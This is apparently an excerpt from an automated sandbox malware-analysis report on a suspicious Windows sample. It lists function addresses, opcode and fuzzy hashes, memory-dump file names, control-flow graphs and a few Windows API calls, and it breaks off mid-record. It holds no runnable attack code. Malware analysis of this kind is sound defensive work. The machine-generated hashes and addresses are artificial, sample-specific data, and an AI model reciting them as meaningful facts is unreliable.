                                      • Instruction ID: 5941d0aa101eebc04ef1576487cf848cdc6c27355a091b7b862900ddc1b30b61
                                      • Opcode Fuzzy Hash: 2bdec9bc548bbb8889deb3edc815bf64c2400c991d6d43f03b18f0610508369e
                                      • Instruction Fuzzy Hash: 4C014C71D0035A65EF20ABA4DD0EEDE7BACBF48344F000465B605E21D1E6B496858BA5
                                      Function 0050B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Malloc
                                      • String ID: (P$ZP
                                      • API String ID: 2696272793-4232729863
                                      • Opcode ID: 6556d41109959d2721cfe5ef900f75a1e75c5ea28c6a1287d11d20f1f994f4f0
                                      • Instruction ID: 31b57788939c68b0b17b0f664bc67a79afca926716ec46fc4e7cf9c676f63311
                                      • Opcode Fuzzy Hash: 6556d41109959d2721cfe5ef900f75a1e75c5ea28c6a1287d11d20f1f994f4f0
                                      • Instruction Fuzzy Hash: 7B014B76640208FFDF059FB0DD59CAEBB6DFF143457100155B906D7160E631AA48EB60

                                      Execution Graph

                                      Execution Coverage:7.8%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 7678 7ffb4b21d8b1 7679 7ffb4b21d8cf QueryFullProcessImageNameA 7678->7679 7681 7ffb4b21da74 7679->7681

                                      Executed Functions

                                      Function 00007FFB4AE20D48 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 305 7ffb4ae20d48-7ffb4ae20d9b call 7ffb4ae207d8 308 7ffb4ae20da0-7ffb4ae20e7e 305->308 320 7ffb4ae20e7f-7ffb4ae20eb9 308->320 325 7ffb4ae20ebb-7ffb4ae20eee 320->325 328 7ffb4ae20eef-7ffb4ae20f05 325->328 330 7ffb4ae20f1e 328->330 331 7ffb4ae20f07-7ffb4ae20f1d 328->331 332 7ffb4ae20f1f-7ffb4ae20f27 330->332 331->330 331->332 335 7ffb4ae20f29 332->335 335->328 336 7ffb4ae20f2b-7ffb4ae20f63 335->336 336->335 339 7ffb4ae20f65-7ffb4ae21050 336->339
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Y_H
                                      • API String ID: 0-3237497481
                                      • Opcode ID: b7776f3fb238dcfc3df573f140d28ee8fb239ee14e8ba2d34ad2a0df102604de
                                      • Instruction ID: 4d38ce52d9894625208aeb6b4691b74352f58d51a0a0c36768e1c58aaa4c7208
                                      • Opcode Fuzzy Hash: b7776f3fb238dcfc3df573f140d28ee8fb239ee14e8ba2d34ad2a0df102604de
                                      • Instruction Fuzzy Hash: 8F91F3B291DA8D8FE749EF68C8657A97FE0FB5A310F1002FAC098C72D2DA7818158341
                                      Function 00007FFB4B21D8B1 Relevance: 1.8, APIs: 1, Instructions: 254COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1772602439.00007FFB4B210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4b210000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID: FullImageNameProcessQuery
                                      • String ID:
                                      • API String ID: 3578328331-0
                                      • Opcode ID: 3d80240bba39f7aeb67daa943dde502f1896111ff476ef038c1f4b1f89aa2bc5
                                      • Instruction ID: ec37d5288746c4d26649fe2c4e936325b3c80a11c4dbf8f015831d3bffbf9c5a
                                      • Opcode Fuzzy Hash: 3d80240bba39f7aeb67daa943dde502f1896111ff476ef038c1f4b1f89aa2bc5
                                      • Instruction Fuzzy Hash: DF719470509A4C8FDB69EF28C8557F93BD1FB59311F04827EE84EC7292CA75A8468B81
                                      Function 00007FFB4AE208D0 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 405 7ffb4ae208d0-7ffb4ae208d9 407 7ffb4ae208db-7ffb4ae208e6 405->407 408 7ffb4ae20916-7ffb4ae20941 405->408 407->408 411 7ffb4ae20943-7ffb4ae20959 408->411 412 7ffb4ae208f6-7ffb4ae20904 408->412 413 7ffb4ae20905-7ffb4ae20915 411->413 416 7ffb4ae2095b-7ffb4ae20997 411->416 412->413 413->408
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: c2898f89cfa7730121835e2926570cd3ef2ff4eabf746af14284edaf1c13528b
                                      • Instruction ID: 89cf7d5697f8c0be9c8e53f9b68c1dc13cd15bf4085244a52723115d847b6179
                                      • Opcode Fuzzy Hash: c2898f89cfa7730121835e2926570cd3ef2ff4eabf746af14284edaf1c13528b
                                      • Instruction Fuzzy Hash: A8417F93A4E6950EE705BBB8E0AA1FD7B84EF49330B2845FFD94EC70D3CD0858428291
                                      Function 00007FFB4AE20960 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 484 7ffb4ae20960 485 7ffb4ae20965-7ffb4ae20997 484->485
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: d82540cd877d194d77bde9881880dac0f1ace85804505d49df2544a897a52ac4
                                      • Instruction ID: 06e586d539297fee2780b6fa847e3c1568fb8fcc8696c03d3d88007b728ff70f
                                      • Opcode Fuzzy Hash: d82540cd877d194d77bde9881880dac0f1ace85804505d49df2544a897a52ac4
                                      • Instruction Fuzzy Hash: 523157A2A4EA561FF315BA7CE06B1F977C5EF49321B6440FAD80EC71D3CC0868428292
                                      Function 00007FFB4AE20998 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 2b4bd6d5cf0f3d86a72156f80f5e5e27c565af65234572d318348297f19e4e1c
                                      • Instruction ID: 001df3fc1504e7cbbb51ea6e0f06e3210bf8c0dab984d2dd2233d93a89b05221
                                      • Opcode Fuzzy Hash: 2b4bd6d5cf0f3d86a72156f80f5e5e27c565af65234572d318348297f19e4e1c
                                      • Instruction Fuzzy Hash: 983159A1B0D9591FE749BA3CC06A6BA7BD6EF99310B6401FDD44EC3293CC14AC428381
                                      Function 00007FFB4AE20908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction ID: 1a1b587f2a4545da66be29f6463e72c757298c26b9eeeac8d926ec8a72eb6dc7
                                      • Opcode Fuzzy Hash: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction Fuzzy Hash: 5521B63130C8184FE768FE1CE889EB973D5FB5932171501BAE59AC7266D911EC8287C6
                                      Function 00007FFB4AE2116D Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee5cb42e2ed30eb33b7b4cfddc856bc56bebc8457de4a2452dc955657728fed2
                                      • Instruction ID: beb7f5c3bc8cbc66e5b10c0983656104e3a98d8a69d76b0f8b855fd86d2d84d7
                                      • Opcode Fuzzy Hash: ee5cb42e2ed30eb33b7b4cfddc856bc56bebc8457de4a2452dc955657728fed2
                                      • Instruction Fuzzy Hash: E531E27190D64A8FDB45FF78C8649A97BF0FF59310B2406FAC01AC7292DB39A941CB41
                                      Function 00007FFB4AE20C25 Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 88cb800846ec3900dc11293e939e311a623dde0d7603f77858b7ca0fa9f16f38
                                      • Instruction ID: fec3d319ae0d3122325ce580701d00db14a63b05db0bf6b4995377ea204953c0
                                      • Opcode Fuzzy Hash: 88cb800846ec3900dc11293e939e311a623dde0d7603f77858b7ca0fa9f16f38
                                      • Instruction Fuzzy Hash: D621B0B2A4C6898FE712BF78C9511AC7FA4EF86320F3546F6C0519B1D2D638194A8782
                                      Function 00007FFB4AE20C38 Relevance: .1, Instructions: 54COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 92da44e5867afe204288e1661e8950873d28fb809c2dc26cd7215ac523057744
                                      • Instruction ID: bbe5a9e66dbb1a6b5f37820e1b46ebbee12c78db918ccd81b493d5f5af0ee5fb
                                      • Opcode Fuzzy Hash: 92da44e5867afe204288e1661e8950873d28fb809c2dc26cd7215ac523057744
                                      • Instruction Fuzzy Hash: 4B119EB2A4D78C8FE702FF78C9511A87FA0EB86310F2546F6C091DB292D5381A0A8781
                                      Function 00007FFB4AE20C40 Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: facff69970792117b5e8838699b8a891f460b66b537bc57c1a10c5bbee64c023
                                      • Instruction ID: ca1b073063040ead81b28ade5c3dc9e560dbe79d12f06f2f61927f5c68828525
                                      • Opcode Fuzzy Hash: facff69970792117b5e8838699b8a891f460b66b537bc57c1a10c5bbee64c023
                                      • Instruction Fuzzy Hash: 6001ADB2A0D7888FE702EF78C5511ED7FB0EF86310F2546F6C491DB292D6381A498B81
                                      Function 00007FFB4AE20C48 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6fd05c6b80d4689bebd0046f6aa1dd098e9a7d04ab366066c832e73273129b18
                                      • Instruction ID: 83fa4816b3ef1b3022f42506fdfc5088d9eee5659873ddb1383be4f5350322c0
                                      • Opcode Fuzzy Hash: 6fd05c6b80d4689bebd0046f6aa1dd098e9a7d04ab366066c832e73273129b18
                                      • Instruction Fuzzy Hash: 66019EB290D3888FE702EF78C55119D7FB0EF86310F2441E6C451DB292D6385A498781
                                      Function 00007FFB4AE20C50 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7ca83069bc7ea6561da0aac3f45aae5c45f3888dadcb5594407091712c25aba9
                                      • Instruction ID: 0463cf144e964b3b0b39335b9a1986cf5997bcca3feb33d7fcc490f86479bbc5
                                      • Opcode Fuzzy Hash: 7ca83069bc7ea6561da0aac3f45aae5c45f3888dadcb5594407091712c25aba9
                                      • Instruction Fuzzy Hash: 44018FB194D3888FE702EF74C55419D7FB0FF46310F2441E6C451DB292D6385A488741
                                      Function 00007FFB4AE254B4 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction ID: 623cb5ec3db3bcdd7d5264b159ff907fbc61991654675882fca915e8515b09fc
                                      • Opcode Fuzzy Hash: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction Fuzzy Hash: 85E0ED62A4C1164AFB94BE64D9607A96264FB89310F3440F89A5F933C1DD29AF448746
                                      Function 00007FFB4AE206AD Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction ID: 68553e4231f3c787109ba703a82ca344d5f3ddda9307c0b9c347bb8c49fb501e
                                      • Opcode Fuzzy Hash: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction Fuzzy Hash: ADC08C83DCF51B00F4503E3ED6260ACA108BBCC320FF000F2C02C408D19C4D28C50147
                                      Function 00007FFB4AE212B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: cbb027c749ba98a0956ca8649bce8f73cb55e5443490ea6b068c0e10e34a01f2
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: 22C08C304908098FC948FF38C88480433A0FF0D300BE100D0E008CB170E219DCC0C781
                                      Function 00007FFB4AE236E2 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 756f5db44ea65ad9e75a360d8c6b0cf9c00465c8530aa3c594db0ee89e98de45
                                      • Instruction ID: 59429d565c3328be0a4a3a30c4e2e96ff372b3c14a8df4ab3c3ace6d5f5396ea
                                      • Opcode Fuzzy Hash: 756f5db44ea65ad9e75a360d8c6b0cf9c00465c8530aa3c594db0ee89e98de45
                                      • Instruction Fuzzy Hash: EAC08C81E0DC1652F12B3628C12117E04429F44700FA00074E82ED22CECE0E1A221282
                                      Function 00007FFB4AE206D0 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: 66bb24201a25f492608003d269a9a95cee25675911af2233b658dfaf55eacb86
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: 5EB01241CDE40F00B4147F7A4A520647444BB8C300FF000F0D41D400C5988D18940243
                                      Function 00007FFB4AE21958 Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: 6db386aad6bf17fdad81bc8a041dc2d4c3adc625ac0fea1f06fdb560be99d77b
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash:

                                      Non-executed Functions

                                      Function 00007FFB4AE209B0 Relevance: 5.2, Strings: 4, Instructions: 193COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: 0bdb4b08ef6dd072a53aac8ba31ce1bef71d74f03b5834344c17d8379a59499d
                                      • Instruction ID: f0d24af9354582a8bacff447595316fd0c5dbedd41495b30f0f31c9f1b29a123
                                      • Opcode Fuzzy Hash: 0bdb4b08ef6dd072a53aac8ba31ce1bef71d74f03b5834344c17d8379a59499d
                                      • Instruction Fuzzy Hash: 7251B4D7A0E22A85E1123ABDF4110FC6B489F45335B5883F3EE4D990C74E8865BB92F5

                                      Execution Graph

                                      Execution Coverage:4.5%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:10
                                      Total number of Limit Nodes:1
                                      execution_graph 34036 7ffb4ae56f41 34037 7ffb4ae56f5f WriteFile 34036->34037 34039 7ffb4ae57027 34037->34039 34040 7ffb4ae59138 34041 7ffb4ae59143 34040->34041 34042 7ffb4ae5918b GetSystemInfo 34040->34042 34044 7ffb4ae592fe 34042->34044 34032 7ffb4ae56d65 34033 7ffb4ae56d7f CreateFileTransactedW 34032->34033 34035 7ffb4ae56e7a 34033->34035

                                      Executed Functions

                                      Function 00007FFB4AE10D48 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 758 7ffb4ae10d48-7ffb4ae10d9b call 7ffb4ae107d8 761 7ffb4ae10da0-7ffb4ae10eb9 758->761 776 7ffb4ae10ebb-7ffb4ae10ee3 761->776 777 7ffb4ae10ee5-7ffb4ae10f05 761->777 776->777 780 7ffb4ae10f1e 777->780 781 7ffb4ae10f07-7ffb4ae10f1d 777->781 783 7ffb4ae10f1f-7ffb4ae10f63 780->783 781->780 781->783 788 7ffb4ae10f8f-7ffb4ae11050 783->788 789 7ffb4ae10f65-7ffb4ae10f88 783->789 789->788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Z_H
                                      • API String ID: 0-3267294416
                                      • Opcode ID: efccc9627b743c5a0e6b3611da1f0959cbad951896a8b0fb3b2d3de8d2e70b3e
                                      • Instruction ID: 754eae5a89e82ee947bb229194beea712659f4f25bc38d99b187066c574aace0
                                      • Opcode Fuzzy Hash: efccc9627b743c5a0e6b3611da1f0959cbad951896a8b0fb3b2d3de8d2e70b3e
                                      • Instruction Fuzzy Hash: 3491D1F1A1CAA98FE745FFACC8697A97FE1FB5A300F1001AAC04AC76D2CA7814158741
                                      Function 00007FFB4B245038 Relevance: 1.3, Instructions: 1266COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d8dbc3e360f2fbf63a2fa21a9f2df1955b721b8526b23eb0d589f926dbb52fbe
                                      • Instruction ID: 42a45c2860cf8b16c5bbd11db628e48791c615655f98d92a28d2eb97de40601e
                                      • Opcode Fuzzy Hash: d8dbc3e360f2fbf63a2fa21a9f2df1955b721b8526b23eb0d589f926dbb52fbe
                                      • Instruction Fuzzy Hash: 2C825E7171C9198FDB49FF3CD4969B973E2EFA870071041B9E44AC72A6DE24EC428B81
                                      Function 00007FFB4AE21142 Relevance: 9.7, Strings: 7, Instructions: 917COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 7ffb4ae21142 1 7ffb4ae21143-7ffb4ae2116d 0->1 4 7ffb4ae212c1-7ffb4ae212eb 1->4 5 7ffb4ae21173-7ffb4ae21235 1->5 10 7ffb4ae212ed-7ffb4ae2130a 4->10 11 7ffb4ae21337-7ffb4ae2133a 4->11 51 7ffb4ae2127c-7ffb4ae2127f 5->51 52 7ffb4ae21237-7ffb4ae2127a 5->52 15 7ffb4ae2147b-7ffb4ae21483 10->15 16 7ffb4ae21310-7ffb4ae21335 10->16 14 7ffb4ae21341-7ffb4ae2134c 11->14 19 7ffb4ae2134e-7ffb4ae2135e 14->19 20 7ffb4ae2135f-7ffb4ae21376 14->20 24 7ffb4ae21484-7ffb4ae21489 15->24 16->11 19->20 32 7ffb4ae2141c-7ffb4ae216d2 call 7ffb4ae22308 20->32 33 7ffb4ae2137c-7ffb4ae213cf 20->33 29 7ffb4ae2148b-7ffb4ae2149f 24->29 30 7ffb4ae21437-7ffb4ae21440 24->30 37 7ffb4ae21459-7ffb4ae21474 30->37 78 7ffb4ae21794-7ffb4ae217c5 32->78 79 7ffb4ae216d8-7ffb4ae216e9 32->79 33->37 55 7ffb4ae213d5-7ffb4ae213e0 33->55 37->15 56 7ffb4ae21281-7ffb4ae21292 51->56 57 7ffb4ae21294-7ffb4ae21295 51->57 63 7ffb4ae212a1-7ffb4ae212bb 52->63 59 7ffb4ae2098d-7ffb4ae209cc 55->59 60 7ffb4ae213e6-7ffb4ae213f0 55->60 56->63 57->63 82 7ffb4ae209ce-7ffb4ae20b44 59->82 60->24 65 7ffb4ae213f6-7ffb4ae21416 60->65 63->4 63->5 65->32 65->33 95 7ffb4ae2197b-7ffb4ae21993 78->95 96 7ffb4ae217cb-7ffb4ae217fd 78->96 83 7ffb4ae216eb-7ffb4ae216f8 79->83 84 7ffb4ae21702-7ffb4ae2178b 79->84 165 7ffb4ae20b4a-7ffb4ae20b5a 82->165 166 7ffb4ae21089-7ffb4ae210bf 82->166 83->84 89 7ffb4ae216fa-7ffb4ae21700 83->89 84->78 135 7ffb4ae2178d 84->135 89->84 102 7ffb4ae21c94-7ffb4ae21cad 95->102 96->102 112 7ffb4ae21803-7ffb4ae21811 96->112 113 7ffb4ae218c5-7ffb4ae218c7 112->113 114 7ffb4ae21817-7ffb4ae2181e 112->114 116 7ffb4ae218cd-7ffb4ae21915 113->116 117 7ffb4ae22302-7ffb4ae22307 113->117 114->113 119 7ffb4ae21824-7ffb4ae218ac 114->119 116->117 134 7ffb4ae2191b-7ffb4ae21962 116->134 150 7ffb4ae218ae-7ffb4ae218b3 119->150 151 7ffb4ae218b6-7ffb4ae218ba 119->151 153 7ffb4ae2196c-7ffb4ae21970 134->153 154 7ffb4ae21964-7ffb4ae21969 134->154 135->78 150->151 151->119 155 7ffb4ae218c0 151->155 153->113 157 7ffb4ae21976 153->157 154->153 155->102 157->102 169 7ffb4ae20b60-7ffb4ae20c33 165->169 174 7ffb4ae210c1-7ffb4ae21100 166->174 175 7ffb4ae21138-7ffb4ae21141 166->175 192 7ffb4ae20c64-7ffb4ae20cb3 169->192 193 7ffb4ae20c35-7ffb4ae20c5e 169->193 184 7ffb4ae21102-7ffb4ae21105 174->184 185 7ffb4ae2111a-7ffb4ae21136 174->185 175->0 184->185 186 7ffb4ae21107-7ffb4ae21117 184->186 185->174 185->175 186->185 201 7ffb4ae20cbf-7ffb4ae20cc8 192->201 202 7ffb4ae20cb5-7ffb4ae20cba 192->202 193->192 203 7ffb4ae21073-7ffb4ae21083 201->203 202->203 203->166 203->169
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
